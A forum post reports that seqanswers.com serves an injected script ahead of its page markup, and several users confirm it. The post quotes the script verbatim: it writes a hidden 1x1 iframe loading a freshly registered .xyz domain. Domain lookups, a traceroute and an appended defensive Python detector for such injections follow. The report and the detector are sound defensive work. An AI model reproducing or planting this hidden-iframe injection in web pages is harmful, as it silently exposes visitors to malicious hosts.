Just checking on this.
Is this legit? If it's not, are others seeing this too?
When I load seqanswers.com, the first HTML is a request for a script from
Example:
<script>document.write("<iframe width='1' height='1' src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825&foul=ashamed&close=9014&listen=49237&peril=queer&snarl=encourage&monday=60544&quiver=86886&build=42380' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<title>SEQanswers Home </title>
This is blocked by my local antivirus software.
The domain http://www.domainiq.com/domain?yourrevolution.xyz
was registered 9 hours ago.
Is there something fishy going on?
___
Edit:
Now it is trying to load from http://pkpgk.yourspin.xyz:32551
Is anybody else getting this? According to http://www.domainiq.com/domain?yourspin.xyz , Max Vlapet registered it 10 hours ago.
____
I know ad companies use pop-up domains to bypass adblockers, but this looks very fishy.
Can others "view source" on seqanswers and confirm if this is specific to seqanswers.com? Just check the first lines of text.
I am getting this on both Chrome and Mozilla.
Traceroute is ...
traceroute 46.108.156.159
traceroute to 46.108.156.159 (46.108.156.159), 30 hops max, 60 byte packets
(first 8 internal to my site removed)
9 66-192-62-13.static.twtelecom.net (66.192.62.13) 4.129 ms 4.642 ms 4.623 ms
10 35.248.2.162 (35.248.2.162) 15.903 ms 15.884 ms 15.748 ms
11 xe-0.equinix.asbnva01.us.bb.gin.ntt.net (206.126.236.12) 5.522 ms 5.877 ms 5.051 ms
12 ae-2.r22.asbnva02.us.bb.gin.ntt.net (129.250.5.136) 5.045 ms 5.312 ms 4.661 ms
13 ae-4.r20.frnkge04.de.bb.gin.ntt.net (129.250.3.21) 92.425 ms 95.965 ms 90.690 ms
14 ae-2.r02.frnkge04.de.bb.gin.ntt.net (129.250.3.94) 133.892 ms 145.722 ms ae-3.r03.frnkge03.de.bb.gin.ntt.net (129.250.6.249) 130.568 ms
15 ae-4.r00.buchro01.ro.bb.gin.ntt.net (129.250.3.79) 126.092 ms 129.742 ms 124.872 ms
16 te5-6-600-bb1.buc1.ro.m247.ro (83.217.231.94) 120.913 ms 132.615 ms 118.762 ms
17 * * *
18 no-rdns.indicii.ro (46.108.156.159) 133.803 ms 129.671 ms 128.985 ms
____
Edit: others at my site are getting it, too.
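The manual check the post asks for (view source and look at the first lines), as an added example that is not part of the original post: a Python function that flags anything served before the DOCTYPE and any 1x1 iframe in that prefix pointing off-site. The function name, the sample response and the `injected.example` host are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

DOC_START = re.compile(r"<!DOCTYPE|<html\b", re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"([a-zA-Z-]+)\s*=\s*(['\"])(.*?)\2")


def check_prefix(html, site_host):
    """Flag content served before the document start and hidden off-site iframes in it."""
    m = DOC_START.search(html)
    prefix = html[:m.start()] if m else ""  # no document start found: nothing to compare
    findings = []
    if prefix.strip():
        findings.append(("content-before-doctype", prefix.strip()[:60]))
    for tag in IFRAME.findall(prefix):  # also matches tags inside document.write("...")
        attrs = {name.lower(): value for name, _, value in ATTR.findall(tag)}
        url = urlsplit(attrs.get("src", ""))
        host = url.hostname or ""
        tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
        offsite = bool(host) and host != site_host and not host.endswith("." + site_host)
        if tiny and offsite:
            findings.append(("hidden-offsite-iframe", url.netloc))
    return findings


# Constructed sample shaped like the response in the post; the host is a placeholder.
SAMPLE = (
    "<script>document.write(\"<iframe width='1' height='1' "
    "src='http://abcde.injected.example:9449/mirror.shtml?a=1&b=2' "
    "scrolling='' frameborder='0'></iframe>\")</script>"
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">\n'
    '<html dir="ltr" lang="en"><head><title>SEQanswers Home </title></head></html>'
)
CLEAN = SAMPLE[SAMPLE.index("<!DOCTYPE"):]  # same page without the injected prefix

if __name__ == "__main__":
    for kind, detail in check_prefix(SAMPLE, "seqanswers.com"):
        print(kind, "->", detail)
```

Run it against the raw response body as saved from the server, not the browser's rendered DOM, since `document.write` output only appears as a string in the raw source.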